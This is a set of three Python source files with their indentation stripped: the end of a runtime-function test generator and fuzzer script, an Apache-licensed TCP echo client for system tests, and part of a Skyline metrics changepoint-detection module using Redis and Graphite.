print("%d functions total; js_fuzzable_functions: %d, "
"cctest_fuzzable_functions: %d, unknown_functions: %d"
% (len(functions), len(js_fuzzable_functions),
len(cctest_fuzzable_functions), len(unknown_functions)))
print("%d JavaScript builtins" % len(builtins))
print("unknown functions:")
for f in unknown_functions:
print(f)
return 0
if action == "check":
errors = 0
def CheckCount(actual, expected, description):
if len(actual) != expected:
print("Expected to detect %d %s, but found %d." % (
expected, description, len(actual)))
print("If this change is intentional, please update the expectations"
" at the top of %s." % THIS_SCRIPT)
return 1
return 0
errors += CheckCount(functions, EXPECTED_FUNCTION_COUNT,
"functions in total")
errors += CheckCount(js_fuzzable_functions, EXPECTED_FUZZABLE_COUNT,
"JavaScript-fuzzable functions")
errors += CheckCount(cctest_fuzzable_functions, EXPECTED_CCTEST_COUNT,
"cctest-fuzzable functions")
errors += CheckCount(unknown_functions, EXPECTED_UNKNOWN_COUNT,
"functions with incomplete type information")
errors += CheckCount(builtins, EXPECTED_BUILTINS_COUNT,
"JavaScript builtins")
def CheckTestcasesExisting(functions):
errors = 0
for f in functions:
if not os.path.isfile(os.path.join(BASEPATH, f.Filename())):
print("Missing testcase for %s, please run '%s generate'" %
(f.name, THIS_SCRIPT))
errors += 1
files = filter(lambda filename: not filename.startswith("."),
os.listdir(BASEPATH))
if (len(files) != len(functions)):
unexpected_files = set(files) - set([f.Filename() for f in functions])
for f in unexpected_files:
print("Unexpected testcase: %s" % os.path.join(BASEPATH, f))
errors += 1
print("Run '%s generate' to automatically clean these up."
% THIS_SCRIPT)
return errors
errors += CheckTestcasesExisting(js_fuzzable_functions)
def CheckNameClashes(runtime_functions, builtins):
errors = 0
runtime_map = {}
for f in runtime_functions:
runtime_map[f.name] = 1
for b in builtins:
if b.name in runtime_map:
print("Builtin/Runtime_Function name clash: %s" % b.name)
errors += 1
return errors
errors += CheckNameClashes(functions, builtins)
if errors > 0:
return 1
print("Generated runtime tests: all good.")
return 0
if action == "generate":
GenerateTestcases(js_fuzzable_functions)
return 0
if action == "fuzz":
processes = []
if not os.path.isdir(options.save_path):
os.makedirs(options.save_path)
stop_running = multiprocessing.Event()
for i in range(multiprocessing.cpu_count()):
args = (i, options, stop_running)
p = multiprocessing.Process(target=RunFuzzer, args=args)
p.start()
processes.append(p)
try:
for i in range(len(processes)):
processes[i].join()
except KeyboardInterrupt:
stop_running.set()
for i in range(len(processes)):
processes[i].join()
return 0
if __name__ == "__main__":
sys.exit(Main())
|
TCP_echo_client.py
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import argparse
import selectors
import signal
import socket
import sys
from threading import Thread
import time
import traceback
from system_test import Logger
from system_test import TIMEOUT
class GracefulExitSignaler:
kill_now = False
def __init__(self):
signal.signal(signal.SIGINT, self.exit_gracefully)
signal.signal(signal.SIGTERM, self.exit_gracefully)
def exit_gracefully(self, signum, frame):
self.kill_now = True
def split_chunk_for_display(raw_bytes):
"""
Given some raw bytes, return a display string
Only show the beginning and end of largish (2xMAGIC_SIZE) arrays.
:param raw_bytes:
:return: display string
"""
MAGIC_SIZE = 50 # Content repeats after chunks this big - used by echo client, too
if len(raw_bytes) > 2 * MAGIC_SIZE:
result = repr(raw_bytes[:MAGIC_SIZE]) + " ... " + repr(raw_bytes[-MAGIC_SIZE:])
else:
result = repr(raw_bytes)
return result
class TcpEchoClient:
def __init__(self, prefix, host, port, size, count, timeout, logger):
"""
:param host: connect to this host
:param port: connect to this port
:param size: size of individual payload chunks in bytes
:param count: number of payload chunks
:param strategy: "1" Send one payload; # TODO more strategies
Recv one payload
:param logger: Logger() object
:return:
"""
# Start up
self.sock = None
self.prefix = prefix
self.host = host
self.port = int(port)
self.size = size
self.count = count
self.timeout = timeout
self.logger = logger
self.keep_running = True
self.is_running = False
self.exit_status = None
self.error = None
self._thread = Thread(target=self.run)
self._thread.daemon = True
self._thread.start()
def run(self):
self.logger.log("%s Client is starting up" % self.prefix)
try:
start_time = time.time()
self.is_running = True
self.logger.log('%s Connecting to host:%s, port:%d, size:%d, count:%d' %
(self.prefix, self.host, self.port, self.size, self.count))
total_sent = 0
total_rcvd = 0
if self.count > 0 and self.size > 0:
# outbound payload only if count and size both greater than zero
payload_out = []
out_list_idx = 0 # current _out array being sent
out_byte_idx = 0 # next-to-send in current array
out_ready_to_send = True
# Generate unique content for each message so you can tell where the message
# or fragment belongs in the whole stream. Chunks look like:
# b'[localhost:33333:6:0]ggggggggggggggggggggggggggggg'
# host: localhost
# port: 33333
# index: 6
# offset into message: 0
CONTENT_CHUNK_SIZE = 50 # Content repeats after chunks this big - used by echo server, too
for idx in range(self.count):
body_msg = ""
padchar = "abcdefghijklmnopqrstuvwxyz@#$%"[idx % 30]
while len(body_msg) < self.size:
chunk = "[%s:%d:%d:%d]" % (self.host, self.port, idx, len(body_msg))
padlen = CONTENT_CHUNK_SIZE - len(chunk)
chunk += padchar * padlen
body_msg += chunk
if len(body_msg) > self.size:
body_msg = body_msg[:self.size]
payload_out.append(bytearray(body_msg.encode()))
# incoming payloads
payload_in = []
in_list_idx = 0 # current _in array being received
for i in range(self.count):
payload_in.append(bytearray())
else:
# when count or size .LE. zero then just connect-disconnect
self.keep_running = False
# Set up connection. If the TCPConnectors have not yet finished
# coming up then it is possible to get a ConnectionRefusedError.
# This is not necessarly an error, so retry
host_address = (self.host, self.port)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn_timeout = time.time() + TIMEOUT
while True:
try:
self.sock.connect(host_address)
break
except ConnectionRefusedError as err:
if time.time() > conn_timeout:
self.logger.log('%s Failed to connect to host:%s port:%d - Connection Refused!'
% (self.prefix, self.host, self.port))
raise
time.sleep(0.1)
self.logger.log('%s Failed to connect to host:%s port:%d - Retrying...'
% (self.prefix, self.host, self.port))
self.sock.setblocking(False)
# set up selector
sel = selectors.DefaultSelector()
sel.register(self.sock,
selectors.EVENT_READ | selectors.EVENT_WRITE)
# event loop
while self.keep_running:
if self.timeout > 0.0:
elapsed = time.time() - start_time
if elapsed > self.timeout:
self.exit_status = "%s Exiting due to timeout. Total sent= %d, total rcvd= %d" % \
(self.prefix, total_sent, total_rcvd)
break
for key, mask in sel.select(timeout=0.1):
sock = key.fileobj
if mask & selectors.EVENT_READ:
recv_data = sock.recv(1024)
if recv_data:
total_rcvd = len(recv_data)
payload_in[in_list_idx].extend(recv_data)
if len(payload_in[in_list_idx]) == self.size:
self.logger.log("%s Rcvd message %d" % (self.prefix, in_list_idx))
in_list_idx += 1
if in_list_idx == self.count:
# Received all bytes of all chunks - done.
self.keep_running = False
# Verify the received data
if payload_in != payload_out:
for idxc in range(self.count):
if not payload_in[idxc] == payload_out[idxc]:
for idxs in range(self.size):
ob = payload_out[idxc][idxs]
ib = payload_in[idxc][idxs]
if ob != ib:
self.error = "%s ERROR Rcvd message verify fail. row:%d, col:%d, " \
"expected:%s, actual:%s" \
% (self.prefix, idxc, idxs, repr(ob), repr(ib))
break
else:
out_ready_to_send = True
sel.modify(sock, selectors.EVENT_READ | selectors.EVENT_WRITE)
elif len(payload_in[in_list_idx]) > self.size:
self.error = "ERROR Received message too big. Expected:%d, actual:%d" % \
(self.size, len(payload_in[in_list_idx]))
break
else:
pass # still accumulating a message
else:
# socket closed
self.keep_running = False
if not in_list_idx == self.count:
self.error = "ERROR server closed. Echoed %d of %d messages." % (in_list_idx, self.count)
if self.keep_running and mask & selectors.EVENT_WRITE:
if out_ready_to_send:
n_sent = self.sock.send(payload_out[out_list_idx][out_byte_idx:])
total_sent += n_sent
out_byte_idx += n_sent
if out_byte_idx == self.size:
self.logger.log("%s Sent message %d" % (self.prefix, out_list_idx))
out_byte_idx = 0
out_list_idx += 1
sel.modify(self.sock, selectors.EVENT_READ) # turn off write events
out_ready_to_send = False # turn on when rcvr receives
else:
pass # logger.log("DEBUG: ignoring EVENT_WRITE")
# shut down
sel.unregister(self.sock)
self.sock.close()
except Exception:
self.error = "ERROR: exception : '%s'" % traceback.format_exc()
self.sock.close()
self.is_running = False
def wait(self, timeout=TIMEOUT):
self.logger.log("%s Client is shutting down" % self.prefix)
self.keep_running = False
self._thread.join(timeout)
def main(argv):
retval = 0
# parse args
p = argparse.ArgumentParser()
p.add_argument('--host', '-b',
help='Required target host')
p.add_argument('--port', '-p', type=int,
help='Required target port number')
p.add_argument('--size', '-s', type=int, default=100, const=1, nargs='?',
help='Size of payload in bytes must be >= 0. Size of zero connects and disconnects with no data traffic.')
p.add_argument('--count', '-c', type=int, default=1, const=1, nargs='?',
help='Number of payloads to process must be >= 0. Count of zero connects and disconnects with no data traffic.')
p.add_argument('--name',
help='Optional logger prefix')
p.add_argument('--timeout', '-t', type=float, default=0.0, const=1, nargs="?",
help='Timeout in seconds. Default value "0" disables timeouts')
p.add_argument('--log', '-l',
action='store_true',
help='Write activity log to console')
del argv[0]
args = p.parse_args(argv)
# host
if args.host is None:
raise Exception("User must specify a host")
host = args.host
# port
if args.port is None:
raise Exception("User must specify a port number")
port = args.port
# size
if args.size < 0:
raise Exception("Size must be greater than or equal to zero")
size = args.size
# count
if args.count < 0:
raise Exception("Count must be greater than or equal to zero")
count = args.count
# name / prefix
prefix = args.name if args.name is not None else "ECHO_CLIENT (%d_%d_%d)" % \
(port, size, count)
# timeout
if args.timeout < 0.0:
raise Exception("Timeout must be greater than or equal to zero")
signaller = GracefulExitSignaler()
logger = None
try:
# logging
logger = Logger(title="%s host:%s port %d size:%d count:%d" % (prefix, host, port, size, count),
print_to_console=args.log,
save_for_dump=False)
client = TcpEchoClient(prefix, host, port, size, count, args.timeout, logger)
keep_running = True
while keep_running:
time.sleep(0.1)
if client.error is not None:
logger.log("%s Client stopped with error: %s" % (prefix, client.error))
keep_running = False
retval = 1
if client.exit_status is not None:
logger.log("%s Client stopped with status: %s" % (prefix, client.exit_status))
keep_running = False
if signaller.kill_now:
logger.log("%s Process killed with signal" % prefix)
keep_running = False
if keep_running and not client.is_running:
logger.log("%s Client stopped with no error or status" % prefix)
keep_running = False
except Exception:
client.error = "ERROR: exception : '%s'" % traceback.format_exc()
if logger is not None:
logger.log("%s Exception: %s" % (prefix, traceback.format_exc()))
retval = 1
if client.error is not None:
# write client errors to stderr
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
elines = client.error.split("\n")
for line in elines:
eprint("ERROR:", prefix, line)
return retval
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
cloudburst.py
|
import logging
from time import time, sleep
from threading import Thread
from multiprocessing import Process
import os
import sys
from os import kill, getpid
import traceback
from timeit import default_timer as timer
from math import ceil
from ast import literal_eval
from msgpack import Unpacker
from sqlalchemy.sql import select
import settings
from skyline_functions import (
get_redis_conn, get_redis_conn_decoded, nonNegativeDerivative)
from functions.redis.get_metric_timeseries import get_metric_timeseries
from functions.graphite.get_metrics_timeseries import get_metrics_timeseries
from custom_algorithms import run_custom_algorithm_on_timeseries
from database import (
get_engine, cloudburst_table_meta, ionosphere_matched_table_meta,
ionosphere_layers_matched_table_meta, ionosphere_table_meta,
anomalies_table_meta)
from functions.database.queries.metric_id_from_base_name import metric_id_from_base_name
skyline_app = 'luminosity'
skyline_app_logger = '%sLog' % skyline_app
logger = logging.getLogger(skyline_app_logger)
skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app)
skyline_app_loglock = '%s.lock' % skyline_app_logfile
skyline_app_logwait = '%s.wait' % skyline_app_logfile
this_host = str(os.uname()[1])
try:
SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
except:
SERVER_METRIC_PATH = ''
skyline_app_graphite_namespace = 'skyline.%s%s' % (skyline_app, SERVER_METRIC_PATH)
full_uniques = '%sunique_metrics' % settings.FULL_NAMESPACE
LOCAL_DEBUG = False
current_path = os.path.dirname(__file__)
root_path = os.path.dirname(current_path)
LUMINOSITY_CLOUDBURST_OPTS = {
'default': {
'window': 4,
'nth_median': 6,
'n_sigma': 6,
}
}
try:
LUMINOSITY_CLOUDBURST_PROCESSES = settings.LUMINOSITY_CLOUDBURST_PROCESSES
except KeyError:
LUMINOSITY_CLOUDBURST_PROCESSES = 2
except:
LUMINOSITY_CLOUDBURST_PROCESSES = 2
try:
run_every = settings.LUMINOSITY_CLOUDBURST_RUN_EVERY
except KeyError:
run_every = 900
except:
run_every = 900
# @added 20210730 - Feature #4164: luminosity - cloudbursts
class Cloudburst(Thread):
"""
The Cloudbursts class which controls the luminosity/cloudburst thread and
spawned processes. luminosity/cloudburst analyses metrics to identify
significant changepoints using the m66 algorithm.
"""
def __init__(self, parent_pid):
"""
Initialize Cloudburst
"""
super(Cloudburst, self).__init__()
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
self.daemon = True
self.parent_pid = parent_pid
self.current_pid = getpid()
def check_if_parent_is_alive(self):
"""
Self explanatory
"""
try:
kill(self.current_pid, 0)
kill(self.parent_pid, 0)
except:
sys.exit(0)
def find_cloudbursts(self, i, unique_metrics):
"""
Create and manage the required lists and Redis sets
"""
process_number = i
spin_start = time()
logger.info('cloudburst :: find_cloudbursts :: process %s started' % str(i))
def get_an_engine():
try:
engine, log_msg, trace = get_engine(skyline_app)
return engine, log_msg, trace
except Exception as e:
trace = traceback.format_exc()
logger.error(trace)
log_msg = 'cloudburst :: find_cloudbursts :: failed to get MySQL engine - %s' % e
logger.error('error :: cloudburst :: find_cloudbursts :: failed to get MySQL engine - %s' % e)
return None, log_msg, trace
def engine_disposal(engine):
if engine:
try:
engine.dispose()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: calling engine.dispose() - %s' % e)
last_run_timestamp = 0
luminosity_cloudburst_last_timestamp_key = 'luminosity.cloudburst.last_run_timestamp.process.%s' % str(i)
try:
last_run_timestamp = self.redis_conn_decoded.get(luminosity_cloudburst_last_timestamp_key)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to get timestamp from %s Redis key - %s' % (
luminosity_cloudburst_last_timestamp_key, e))
last_run_timestamp = 0
if last_run_timestamp:
logger.info('cloudburst :: find_cloudbursts :: %s Redis key has not expired, not running' % (
luminosity_cloudburst_last_timestamp_key))
return
# Set Redis key
try:
self.redis_conn_decoded.setex(luminosity_cloudburst_last_timestamp_key, 60, str(int(spin_start)))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed set timestamp for %s Redis key - %s' % (
luminosity_cloudburst_last_timestamp_key, e))
if len(unique_metrics) == 0:
logger.error('error :: cloudburst :: find_cloudbursts :: failed to determine unique_metrics from %s Redis key' % (
full_uniques))
return
# Discover assigned metrics
keys_per_processor = int(ceil(float(len(unique_metrics)) / float(LUMINOSITY_CLOUDBURST_PROCESSES)))
if i == LUMINOSITY_CLOUDBURST_PROCESSES:
assigned_max = len(unique_metrics)
else:
assigned_max = min(len(unique_metrics), i * keys_per_processor)
assigned_min = (i - 1) * keys_per_processor
assigned_keys = range(assigned_min, assigned_max)
# Compile assigned metrics
assigned_metrics = [unique_metrics[index] for index in assigned_keys]
use_mget = True
# assigned_metrics = unique_metrics[500:503]
# use_mget = False
# align = True
truncate_last_datapoint = True
window = 10
nth_median = 6
n_sigma = 6
# long_period_high_res = True
long_period_high_res = False
custom_algorithm = 'm66'
algorithm_source = '%s/custom_algorithms/%s.py' % (root_path, custom_algorithm)
m66_candidate_metrics = {}
now_timestamp = int(time())
key_reference_timestamp = (int(now_timestamp) // run_every * run_every)
processed_metrics_key = 'luminosity.cloudburst.processed_metrics.%s' % str(key_reference_timestamp)
cloudburst_info_key = 'luminosity.cloudburst.info.%s' % str(key_reference_timestamp)
# This key is NOT managed in metrics manager it is managed below
cloudburst_anomalies_processed_key = 'luminosity.cloudburst.anomalies_processed'
# check_last = 3600
# check_last = 5400
check_last = (3600 * 4)
# check_last = 86400
long_period_check_last = (3600 * 6)
# long_period_check_last = 86400
if long_period_high_res:
long_period_check_last = (3600 * 4)
logger.info('cloudburst :: find_cloudbursts :: checking %s metrics with %s' % (
str(len(assigned_metrics)), custom_algorithm))
redis_hash_key = 'analyzer.metrics_manager.resolutions'
resolutions_dict = {}
try:
resolutions_dict = self.redis_conn_decoded.hgetall(redis_hash_key)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: fail to query Redis hash key %s - %s' % (
redis_hash_key, e))
return
# Manage the luminosity.cloudburst.anomalies_processed delete entries
# older than a week. This Redis hash contains both short_period and
# long_period identified AND processed metric timestamps to increase
# efficiency in pushing short_period cloudbursts to second stage
# analysis.
cloudburst_anomalies_processed = {}
try:
cloudburst_anomalies_processed = self.redis_conn_decoded.hgetall(cloudburst_anomalies_processed_key)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: fail to query Redis hash key %s - %s' % (
cloudburst_anomalies_processed_key, e))
for key in list(cloudburst_anomalies_processed.keys()):
key_ts = None
try:
key_ts = int(str(key.split('.')[-1]))
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: fail to determine key_ts from key %s - %s' % (
str(key), e))
if isinstance(key_ts, int):
# if key_ts < (now_timestamp - (86400 * 7)):
if key_ts < (now_timestamp - long_period_check_last):
try:
self.redis_conn_decoded.hdel(cloudburst_anomalies_processed_key, key)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: fail to delete %s from Redis hash key %s - %s' % (
str(key), cloudburst_anomalies_processed_key, e))
raw_assigned = None
derivative_metrics = []
if use_mget:
try:
raw_assigned = self.redis_conn.mget(assigned_metrics)
logger.info('cloudburst :: find_cloudbursts :: got raw_assigned metric data from Redis for %s metrics' % str(len(assigned_metrics)))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to get raw_assigned from Redis - %s' % e)
try:
# @modified 20211012 - Feature #4280: aet.metrics_manager.derivative_metrics Redis hash
# derivative_metrics = list(self.redis_conn_decoded.smembers('derivative_metrics'))
derivative_metrics = list(self.redis_conn_decoded.smembers('aet.metrics_manager.derivative_metrics'))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to get derivative_metrics from Redis - %s' % e)
derivative_metrics = []
try:
non_derivative_monotonic_metrics = list(settings.NON_DERIVATIVE_MONOTONIC_METRICS)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to get non_derivative_monotonic_metrics from Redis - %s' % e)
non_derivative_monotonic_metrics = []
timer_start = timer()
processed = 0
no_data = 0
too_short = 0
too_old = 0
not_analysed = 0
analysed = 0
for item_index, metric in enumerate(assigned_metrics):
if processed:
if (processed % 100) == 0:
logger.info('cloudburst :: find_cloudbursts :: processed %s of %s metrics with %s algorithm, %s significant changepoint candidates at %s hours found so far' % (
str(processed), str(len(assigned_metrics)), custom_algorithm,
str(len(m66_candidate_metrics)), str(int(check_last / 3600))))
metric_name = metric
if metric_name.startswith(settings.FULL_NAMESPACE):
base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
else:
base_name = metric_name
metric_name = '%s%s' % (settings.FULL_NAMESPACE, base_name)
try:
self.redis_conn.sadd(processed_metrics_key, metric_name)
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: failed to add %s to %s Redis set - %s' % (
metric_name, processed_metrics_key, e))
timeseries = []
if raw_assigned:
try:
raw_series = raw_assigned[item_index]
unpacker = Unpacker(use_list=False)
unpacker.feed(raw_series)
timeseries = list(unpacker)
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: failed to unpack %s timeseries - %s' % (
metric_name, e))
timeseries = []
if timeseries:
calculate_derivative = False
if metric_name in derivative_metrics:
calculate_derivative = True
if metric_name in non_derivative_monotonic_metrics:
calculate_derivative = False
if calculate_derivative:
try:
derivative_timeseries = nonNegativeDerivative(timeseries)
timeseries = derivative_timeseries
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: nonNegativeDerivative failed on %s - %s' % (
metric_name, e))
continue
if not timeseries:
try:
timeseries = get_metric_timeseries(skyline_app, base_name, False)
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: get_metric_timeseries failed for %s - %s' % (
base_name, e))
timeseries = []
if not timeseries:
no_data += 1
continue
if len(timeseries) < 3:
too_short += 1
continue
timeseries_last_timestamp = int(timeseries[-1][0])
if timeseries_last_timestamp < (now_timestamp - (run_every * 2)):
too_old += 1
continue
if truncate_last_datapoint:
timeseries_length = len(timeseries)
timeseries = timeseries[1:(timeseries_length - 2)]
resolution = 0
try:
resolution = int(resolutions_dict[base_name])
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: failed get resolution for %s from resolutions_dict - %s' % (
base_name, e))
continue
# first_timestamp = now_timestamp - (3600 * 4)
# timeseries = [item for item in timeseries if int(item[0]) >= first_timestamp]
aligned_timeseries = []
for ts, value in timeseries:
aligned_timeseries.append([int(int(ts) // resolution * resolution), value])
timeseries = aligned_timeseries
custom_check_last = check_last
window = 5
if resolution > 60:
custom_check_last = check_last + 1800
window = 4
if resolution > 600:
custom_check_last = check_last + 3600
window = 3
nth_median = 6
n_sigma = 6
use_debug_logging = False
debug_algorithms = False
custom_algorithm_dict = {
'base_name': base_name,
'algorithm_source': algorithm_source,
'algorithm_parameters': {
'nth_median': nth_median, 'sigma': n_sigma, 'window': window,
'minimum_sparsity': 75, 'resolution': resolution,
'determine_duration': True, 'return_anomalies': True,
'save_plots_to': False, 'save_plots_to_absolute_dir': False,
'filename_prefix': False, 'debug_logging': use_debug_logging,
'shift_to_start_of_window': False,
},
'max_execution_time': 0.5,
'consensus': 1,
'algorithms_allowed_in_consensus': [custom_algorithm],
'run_3sigma_algorithms': False,
'run_before_3sigma': False,
'run_only_if_consensus': False,
'use_with': [skyline_app],
'debug_logging': False
}
result = None
anomalyScore = None
anomalies = []
try:
result, anomalyScore, anomalies = run_custom_algorithm_on_timeseries(skyline_app, self.current_pid, base_name, timeseries, custom_algorithm, custom_algorithm_dict, debug_algorithms)
if result and debug_algorithms:
logger.info('cloudburst :: find_cloudbursts :: %s - result: %s, anomalyScore: %s, anomalies: %s' % (
base_name, str(result), str(anomalyScore), str(len(anomalies))))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to run custom_algorithm %s on %s - %s' % (
custom_algorithm, base_name, e))
continue
if result is None:
not_analysed += 1
else:
analysed += 1
processed += 1
new_anomalies = []
if anomalies:
anomaly_timestamps = [int(item[0]) for item in anomalies]
anomalies_present_in_period = [ts for ts in anomaly_timestamps if int(ts) > (now_timestamp - custom_check_last)]
if len(anomalies_present_in_period) == 0:
continue
for item in anomalies:
if int(item[0]) not in anomalies_present_in_period:
continue
already_added = None
processed_anomaly_key = '%s.%s' % (base_name, str(int(item[0])))
try:
already_added = self.redis_conn_decoded.hget(cloudburst_anomalies_processed_key, processed_anomaly_key)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed at determine already_added from %s - %s' % (
processed_anomaly_key, e))
if not already_added:
new_anomalies.append(item)
if new_anomalies:
m66_candidate_metrics[base_name] = {}
m66_candidate_metrics[base_name][custom_algorithm] = {}
m66_candidate_metrics[base_name][custom_algorithm]['anomalies'] = new_anomalies
timer_end = timer()
logger.info('cloudburst :: find_cloudbursts :: found %s candidate_metrics with %s algorithm from %s processed metrics in %.6f seconds' % (
str(len(m66_candidate_metrics)), custom_algorithm,
str(processed), (timer_end - timer_start)))
info_data_dict = {
'processed': processed,
'analysed': analysed,
'not_analysed': not_analysed,
'no_data': no_data,
'too_short': too_short,
'too_old': too_old,
}
try:
self.redis_conn_decoded.hset(cloudburst_info_key, process_number, str(info_data_dict))
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: failed to add %s Redis hash key %s - %s' % (
str(info_data_dict), cloudburst_info_key, e))
candidate_metrics_key = 'luminosity.cloudburst.candidate_metrics.short_period.%s' % str(key_reference_timestamp)
key_created = False
for base_name in list(m66_candidate_metrics.keys()):
try:
self.redis_conn.hset(candidate_metrics_key, base_name, str(m66_candidate_metrics[base_name]))
self.redis_conn.expire(candidate_metrics_key, 3600)
key_created = True
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: failed to create %s Redis hash key - %s' % (
candidate_metrics_key, e))
if key_created:
logger.info('cloudburst :: find_cloudbursts :: created %s Redis hash key' % (
candidate_metrics_key))
# Second stage analysis, check to see if the changepoint is anomalous
# at 7 days
second_stage_m66_candidate_metrics = {}
timer_start = timer()
if len(m66_candidate_metrics) > 0:
logger.info('cloudburst :: find_cloudbursts :: checking %s candidate_metrics with %s algorithm at 7 days' % (
str(len(m66_candidate_metrics)), custom_algorithm))
from_timestamp = int(now_timestamp) - (86400 * 7)
until_timestamp = int(now_timestamp)
window = 4
summarize_intervalString = '15min'
summarize_func = 'median'
nth_median = 6
n_sigma = 6
resolution = 900
if long_period_high_res:
window = 10
nth_median = 6
n_sigma = 6
resolution = 60
truncate_last_datapoint = True
metrics_to_do = list(m66_candidate_metrics.keys())
while len(metrics_to_do) > 0:
current_base_names = []
while len(current_base_names) < 50 and len(metrics_to_do) > 0:
current_base_names.append(metrics_to_do.pop(0))
metrics_functions = {}
truncate_last_datapoint = False
for base_name in current_base_names:
metrics_functions[base_name] = {}
if long_period_high_res:
metrics_functions[base_name]['functions'] = None
else:
metrics_functions[base_name]['functions'] = {'summarize': {'intervalString': summarize_intervalString, 'func': summarize_func}}
# If the timeseries is summarized truncate the last datapoint
# so it does not fall off a cliff
truncate_last_datapoint = True
try:
metrics_timeseries = get_metrics_timeseries(skyline_app, metrics_functions, from_timestamp, until_timestamp, log=False)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: get_metrics_timeseries failed - %s' % e)
for base_name in current_base_names:
timeseries = []
try:
timeseries = metrics_timeseries[base_name]['timeseries']
except KeyError:
timeseries = []
if not timeseries:
logger.error('error :: cloudburst :: find_cloudbursts :: no timeseries from Graphite for %s' % base_name)
continue
if truncate_last_datapoint:
timeseries_length = len(timeseries)
timeseries = timeseries[1:(timeseries_length - 2)]
if long_period_high_res:
aligned_timeseries = []
for ts, value in timeseries:
aligned_timeseries.append([int(int(ts) // resolution * resolution), value])
timeseries = aligned_timeseries
some_debug = False
if some_debug:
logger.debug('debug :: cloudburst :: find_cloudbursts :: checking timeseries of length %s from Graphite for %s' % (
str(len(timeseries)), base_name))
custom_algorithm_dict = {
'base_name': base_name,
'algorithm_source': algorithm_source,
'algorithm_parameters': {
'nth_median': nth_median, 'sigma': n_sigma, 'window': window,
'minimum_sparsity': 0, 'resolution': resolution,
'determine_duration': True, 'return_anomalies': True,
'save_plots_to': False, 'save_plots_to_absolute_dir': False,
'filename_prefix': False, 'debug_logging': False,
},
'max_execution_time': 0.5,
'consensus': 1,
'algorithms_allowed_in_consensus': [custom_algorithm],
'run_3sigma_algorithms': False,
'run_before_3sigma': False,
'run_only_if_consensus': False,
'use_with': [skyline_app],
'debug_logging': False
}
debug_algorithms = False
result = None
anomalyScore = None
anomalies = []
try:
result, anomalyScore, anomalies = run_custom_algorithm_on_timeseries(skyline_app, self.current_pid, base_name, timeseries, custom_algorithm, custom_algorithm_dict, debug_algorithms)
if result and debug_algorithms:
logger.info('cloudburst :: find_cloudbursts :: %s - result: %s, anomalyScore: %s, anomalies: %s' % (
base_name, str(result), str(anomalyScore), str(len(anomalies))))
if some_debug:
logger.debug('debug :: cloudburst :: find_cloudbursts :: %s - result: %s, anomalyScore: %s, anomalies: %s' % (
base_name, str(result), str(anomalyScore), str(len(anomalies))))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to run custom_algorithm %s on %s - %s' % (
custom_algorithm, base_name, e))
continue
new_anomalies = []
if anomalies:
anomaly_timestamps = [int(item[0]) for item in anomalies]
anomalies_present_in_period = [ts for ts in anomaly_timestamps if int(ts) > (now_timestamp - long_period_check_last)]
if len(anomalies_present_in_period) == 0:
if some_debug:
logger.debug('debug :: cloudburst :: find_cloudbursts :: %s has no cloudbursts in period' % base_name)
continue
for item in anomalies:
if int(item[0]) not in anomalies_present_in_period:
continue
already_added = None
processed_anomaly_key = '%s.%s' % (base_name, str(int(item[0])))
try:
already_added = self.redis_conn_decoded.hget(cloudburst_anomalies_processed_key, processed_anomaly_key)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed at determine already_added from %s - %s' % (
processed_anomaly_key, e))
if not already_added:
new_anomalies.append(item)
else:
if some_debug:
logger.debug('debug :: cloudburst :: find_cloudbursts :: all %s cloudbursts in period for %s have already been processed' % (
str(len(anomalies)), base_name))
if new_anomalies:
logger.info('cloudburst :: find_cloudbursts :: %s found %s new anomalies in window - %s - result: %s, anomalyScore: %s, anomalies: %s' % (
custom_algorithm, str(len(new_anomalies)),
base_name, str(result), str(anomalyScore),
str(len(new_anomalies))))
second_stage_m66_candidate_metrics[base_name] = {}
